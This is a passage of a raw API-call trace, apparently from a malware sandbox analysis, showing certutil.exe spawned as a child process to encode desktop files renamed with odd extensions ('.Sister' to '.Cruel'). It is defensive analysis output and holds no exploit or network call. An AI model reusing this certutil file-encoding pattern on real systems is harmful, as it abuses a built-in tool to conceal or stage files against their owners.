out: _Buffer=" 49.455s") returned 8 [0214.916] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x16e970ae300 [0214.916] SetLastError (dwErrCode=0x80070716) [0214.916] _vsnwprintf (in: _Buffer=0x346999f788, _BufferCount=0xb, _Format="%d", _ArgList=0x346999f778 | out: _Buffer="948") returned 3 [0214.916] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x346999f540, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0214.916] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x16e970ab2c0 [0214.916] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x16e970a4540 [0214.916] LocalFree (hMem=0x16e970ae300) returned 0x0 [0214.916] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x346999fa30 | out: lpSystemTimeAsFileTime=0x346999fa30*(dwLowDateTime=0xaab56f71, dwHighDateTime=0x1d6141f)) [0214.916] GetLocalTime (in: lpSystemTime=0x346999fa68 | out: lpSystemTime=0x346999fa68*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x31, wMilliseconds=0x1c8)) [0214.916] SystemTimeToFileTime (in: lpSystemTime=0x346999fa68, lpFileTime=0x346999fa40 | out: lpFileTime=0x346999fa40) returned 1 [0214.916] CompareFileTime (lpFileTime1=0x346999fa40, lpFileTime2=0x346999fa30) returned 1 [0214.917] _vsnwprintf (in: _Buffer=0x346999fa78, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x346999fa08 | out: _Buffer="GMT + 2.00") returned 10 [0214.917] LocalFree (hMem=0x16e970ab760) returned 0x0 [0214.917] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0214.917] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0214.917] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0214.917] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0214.917] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0214.917] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x346999faa8 | out: _Buffer="10.0.15063.447") returned 14 [0214.917] GetACP () returned 0x4e4 [0214.917] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0214.917] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x16e970ab8a0 [0214.917] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x16e970ab8a0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0214.917] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x16e970ae280 [0214.917] _vsnwprintf (in: _Buffer=0x16e970ae280, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x346999faf8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0214.918] LocalFree (hMem=0x16e970ab8a0) returned 0x0 [0214.918] LocalFree (hMem=0x0) returned 0x0 [0214.918] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0214.918] GetACP () returned 0x4e4 [0214.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0214.918] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x16e970ab2e0 [0214.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x16e970ab2e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0214.918] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x16e970adc00 [0214.918] _vsnwprintf (in: _Buffer=0x16e970adc00, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x346999faf8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0214.918] LocalFree (hMem=0x16e970ab2e0) returned 0x0 [0214.918] LocalFree (hMem=0x0) returned 0x0 [0214.918] GetACP () returned 0x4e4 [0214.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0214.918] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x16e970ab4c0 [0214.918] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x16e970ab4c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0214.918] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x16e970adbc0 [0214.918] _vsnwprintf (in: _Buffer=0x16e970adbc0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x346999fb28 | out: _Buffer="10.0.15063.447 retail") returned 21 [0214.918] LocalFree (hMem=0x16e970ab4c0) returned 0x0 [0214.918] LocalFree (hMem=0x16e970ae280) returned 0x0 [0214.918] LocalFree (hMem=0x16e970adc00) returned 0x0 [0214.919] LocalFree (hMem=0x16e970adbc0) returned 0x0 [0214.919] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0214.919] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0214.919] GetStockObject (i=0) returned 0x900010 [0214.919] RegisterClassW (lpWndClass=0x346999fc50) returned 0xc1a2 [0214.919] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1202be [0214.933] NtdllDefWindowProc_W () returned 0x0 [0214.933] NtdllDefWindowProc_W () returned 0x1 [0214.938] NtdllDefWindowProc_W () returned 0x0 [0214.946] UpdateWindow (hWnd=0x1202be) returned 1 [0214.946] PostMessageW (hWnd=0x1202be, Msg=0x400, wParam=0x0, lParam=0x16e9709217e) returned 1 [0214.947] GetMessageW (in: lpMsg=0x346999fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x346999fca0) returned 1 [0214.947] TranslateMessage (lpMsg=0x346999fca0) returned 0 [0214.947] DispatchMessageW (lpMsg=0x346999fca0) returned 0x0 [0214.947] NtdllDefWindowProc_W () returned 0x0 [0214.947] GetMessageW (in: lpMsg=0x346999fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x346999fca0) returned 1 [0214.947] TranslateMessage (lpMsg=0x346999fca0) returned 0 [0214.947] DispatchMessageW (lpMsg=0x346999fca0) returned 0x0 [0214.947] LocalAlloc (uFlags=0x0, uBytes=0x66) returned 0x16e970943e0 [0214.947] LocalAlloc (uFlags=0x0, uBytes=0x72) returned 0x16e97098520 [0214.947] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0214.947] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0214.947] SetLastError (dwErrCode=0x80070716) [0214.947] _vsnwprintf (in: _Buffer=0x346999f6a8, _BufferCount=0xb, _Format="%d", _ArgList=0x346999f698 | out: _Buffer="465") returned 3 [0214.947] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x346999f460, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0214.947] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x16e970a3de0 [0214.948] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0214.948] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0214.948] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x346999f440, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0214.948] GetLastError () returned 0xcb [0214.948] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0214.948] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0214.948] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0214.948] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0214.948] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0214.948] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0214.948] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0214.948] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0214.948] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0214.948] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0214.948] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0214.948] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0214.948] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0214.948] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0214.948] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0214.948] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0214.948] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0214.949] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0214.949] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0214.949] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0214.949] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0214.949] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x346999f108 | out: phkResult=0x346999f108*=0x23c) returned 0x0 [0214.949] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x16e97099350 [0214.949] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x346999f678, lpData=0x346999f6a8, lpcbData=0x346999f670*=0x4 | out: lpType=0x346999f678*=0x0, lpData=0x346999f6a8*=0x0, lpcbData=0x346999f670*=0x4) returned 0x2 [0214.949] LocalFree (hMem=0x16e97099350) returned 0x0 [0214.949] RegCloseKey (hKey=0x23c) returned 0x0 [0214.949] LocalFree (hMem=0x0) returned 0x0 [0214.949] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x16e970bd4c0 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0214.959] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0214.959] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0214.960] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0214.960] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0214.960] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0214.960] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0214.960] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0214.960] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0214.960] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0214.960] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x16e970c1120 [0214.960] GetComputerNameW (in: lpBuffer=0x16e970c1120, nSize=0x346999f670 | out: lpBuffer="NQDPDE", nSize=0x346999f670) returned 1 [0214.960] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x346999f640 | out: lpBuffer=0x0, nSize=0x346999f640) returned 0 [0214.960] GetLastError () returned 0xea [0214.960] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x16e970ab720 [0214.960] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x16e970ab720, nSize=0x346999f640 | out: lpBuffer="NQdPdE", nSize=0x346999f640) returned 1 [0214.961] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0214.963] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x16e970c11c0, cbCertEncoded=0xf6b1) returned 0x0 [0214.967] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x16e970c11c0, cbCrlEncoded=0xf6b1) returned 0x0 [0214.969] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x16e970c11c0, cbEncoded=0xf6b1, dwFlags=0x8000, pDecodePara=0x346999f520, pvStructInfo=0x346999f5b0, pcbStructInfo=0x346999f5a4 | out: pvStructInfo=0x346999f5b0, pcbStructInfo=0x346999f5a4) returned 0 [0214.969] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x16e970c11c0, cbEncoded=0xf6b1, dwFlags=0x8000, pDecodePara=0x346999f520, pvStructInfo=0x346999f5b0, pcbStructInfo=0x346999f5a4 | out: pvStructInfo=0x346999f5b0, pcbStructInfo=0x346999f5a4) returned 0 [0214.969] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x16e970c11c0, cbEncoded=0xf6b1, dwFlags=0x8000, pDecodePara=0x346999f520, pvStructInfo=0x346999f5b0, pcbStructInfo=0x346999f5a4 | out: pvStructInfo=0x346999f5b0, pcbStructInfo=0x346999f5a4) returned 0 [0214.969] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x16e970a1c60 [0214.978] CryptMsgUpdate (hCryptMsg=0x16e970a1c60, pbData=0x16e970c11c0, cbData=0xf6b1, fFinal=1) returned 0 [0214.978] GetLastError () returned 0x8009310b [0214.978] CryptMsgClose (hCryptMsg=0x16e970a1c60) returned 1 [0214.979] GetFileAttributesExW (in: lpFileName="33_iBLAi.mp3.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\33_iblai.mp3.sister"), fInfoLevelId=0x0, lpFileInformation=0x346999f5d0 | out: lpFileInformation=0x346999f5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b737120, ftCreationTime.dwHighDateTime=0x1d5f009, ftLastAccessTime.dwLowDateTime=0x2037c380, ftLastAccessTime.dwHighDateTime=0x1d5ed36, ftLastWriteTime.dwLowDateTime=0x2037c380, ftLastWriteTime.dwHighDateTime=0x1d5ed36, nFileSizeHigh=0x0, nFileSizeLow=0xf6b1)) returned 1 [0214.979] _vsnwprintf (in: _Buffer=0x346999f5d8, _BufferCount=0xb, _Format="%d", _ArgList=0x346999f5c8 | out: _Buffer="359") returned 3 [0214.979] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x346999f390, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0214.979] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x16e970c0dc0 [0214.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.979] _vsnwprintf (in: _Buffer=0x346999e5c0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x346999f618 | out: _Buffer="Input Length = 63153") returned 20 [0214.979] GetFileType (hFile=0x50) returned 0x2 [0214.979] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x346999e5c0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x346999e574, lpReserved=0x0 | out: lpBuffer=0x346999e5c0*, lpNumberOfCharsWritten=0x346999e574*=0x14) returned 1 [0214.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.981] _vsnwprintf (in: _Buffer=0x346999e5c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x346999f618 | out: _Buffer="\n") returned 1 [0214.981] GetFileType (hFile=0x50) returned 0x2 [0214.981] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x346999e5c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x346999e574, lpReserved=0x0 | out: lpBuffer=0x346999e5c0*, lpNumberOfCharsWritten=0x346999e574*=0x1) returned 1 [0214.998] GetFileAttributesExW (in: lpFileName="33_iBLAi.mp3.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\33_iblai.mp3.cruel"), fInfoLevelId=0x0, lpFileInformation=0x346999f5d0 | out: lpFileInformation=0x346999f5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaac0ba41, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xaac0ba41, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xaac1b3b6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1536c)) returned 1 [0214.998] _vsnwprintf (in: _Buffer=0x346999f5d8, _BufferCount=0xb, _Format="%d", _ArgList=0x346999f5c8 | out: _Buffer="361") returned 3 [0214.998] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x346999f390, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0214.998] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x16e970c1180 [0214.998] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.998] _vsnwprintf (in: _Buffer=0x346999e5c0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x346999f618 | out: _Buffer="Output Length = 86892") returned 21 [0214.998] GetFileType (hFile=0x50) returned 0x2 [0214.998] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x346999e5c0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x346999e574, lpReserved=0x0 | out: lpBuffer=0x346999e5c0*, lpNumberOfCharsWritten=0x346999e574*=0x15) returned 1 [0214.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0214.999] _vsnwprintf (in: _Buffer=0x346999e5c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x346999f618 | out: _Buffer="\n") returned 1 [0214.999] GetFileType (hFile=0x50) returned 0x2 [0214.999] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x346999e5c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x346999e574, lpReserved=0x0 | out: lpBuffer=0x346999e5c0*, lpNumberOfCharsWritten=0x346999e574*=0x1) returned 1 [0215.004] LocalFree (hMem=0x16e970c11c0) returned 0x0 [0215.004] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0215.004] _vsnwprintf (in: _Buffer=0x346999f638, _BufferCount=0xb, _Format="%d", _ArgList=0x346999f628 | out: _Buffer="2022") returned 4 [0215.004] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x346999f3f0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0215.004] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x16e97098ca0 [0215.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.004] _vsnwprintf (in: _Buffer=0x346999e620, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x346999f678 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0215.004] GetFileType (hFile=0x50) returned 0x2 [0215.004] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x346999e620*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x346999e5d4, lpReserved=0x0 | out: lpBuffer=0x346999e620*, lpNumberOfCharsWritten=0x346999e5d4*=0x31) returned 1 [0215.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.005] _vsnwprintf (in: _Buffer=0x346999e620, _BufferCount=0x1ff, _Format="\n", _ArgList=0x346999f678 | out: _Buffer="\n") returned 1 [0215.005] GetFileType (hFile=0x50) returned 0x2 [0215.005] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x346999e620*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x346999e5d4, lpReserved=0x0 | out: lpBuffer=0x346999e620*, lpNumberOfCharsWritten=0x346999e5d4*=0x1) returned 1 [0215.011] LocalFree (hMem=0x0) returned 0x0 [0215.011] LocalFree (hMem=0x16e97098520) returned 0x0 [0215.011] LocalFree (hMem=0x16e970943e0) returned 0x0 [0215.011] SetLastError (dwErrCode=0x80070716) [0215.011] _vsnwprintf (in: _Buffer=0x346999f6a8, _BufferCount=0xb, _Format="%d", _ArgList=0x346999f698 | out: _Buffer="511") returned 3 [0215.011] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x346999f460, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0215.011] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x16e970c0cd0 [0215.012] PostQuitMessage (nExitCode=0) [0215.012] GetMessageW (in: lpMsg=0x346999fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x346999fca0) returned 0 [0215.012] LocalFree (hMem=0x16e970ab720) returned 0x0 [0215.012] LocalFree (hMem=0x16e970c1120) returned 0x0 [0215.012] LocalFree (hMem=0x0) returned 0x0 [0215.012] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0215.012] GetLastError () returned 0x7e [0215.013] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0215.013] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0215.013] DllMain () returned 0x1 [0215.013] LocalFree (hMem=0x16e970ab2c0) returned 0x0 [0215.013] LocalFree (hMem=0x16e970a3de0) returned 0x0 [0215.013] LocalFree (hMem=0x16e970c0dc0) returned 0x0 [0215.013] LocalFree (hMem=0x16e970c1180) returned 0x0 [0215.013] LocalFree (hMem=0x16e97098ca0) returned 0x0 [0215.013] LocalFree (hMem=0x16e970c0cd0) returned 0x0 [0215.013] LocalFree (hMem=0x16e970a4540) returned 0x0 [0215.013] LocalFree (hMem=0x16e970a42f0) returned 0x0 [0215.013] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0215.013] GetLastError () returned 0x7e [0215.014] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0215.014] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0215.014] DllMain () returned 0x1 [0215.014] exit (_Code=0) Thread: id = 37 os_tid = 0x24c Process: id = "10" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1d010000" os_pid = "0xd14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 38 os_tid = 0xd1c [0215.320] GetStartupInfoW (in: lpStartupInfo=0x324ae7fcd0 | out: lpStartupInfo=0x324ae7fcd0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0215.326] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0215.326] __set_app_type (_Type=0x1) [0215.326] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0215.326] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0215.329] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0215.329] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0215.330] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0215.330] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0215.330] WerSetFlags () returned 0x0 [0215.330] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.330] __iob_func () returned 0x7ffcea2dea00 [0215.331] _fileno (_File=0x7ffcea2dea30) returned 1 [0215.331] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0215.331] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0215.332] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0215.332] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0215.332] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0215.332] GetConsoleOutputCP () returned 0x1b5 [0215.333] _vsnwprintf (in: _Buffer=0x324ae7fc40, _BufferCount=0xb, _Format=".%d", _ArgList=0x324ae7fb68 | out: _Buffer=".437") returned 4 [0215.333] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0215.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0215.333] GetFileType (hFile=0x50) returned 0x2 [0215.333] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0215.333] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0215.333] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.334] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0215.334] GetCommandLineW () returned="certutil -encode \"3Pvsa95E4Bhj9.jpg.Sister\" \"3Pvsa95E4Bhj9.jpg.Cruel\"" [0215.334] LocalAlloc 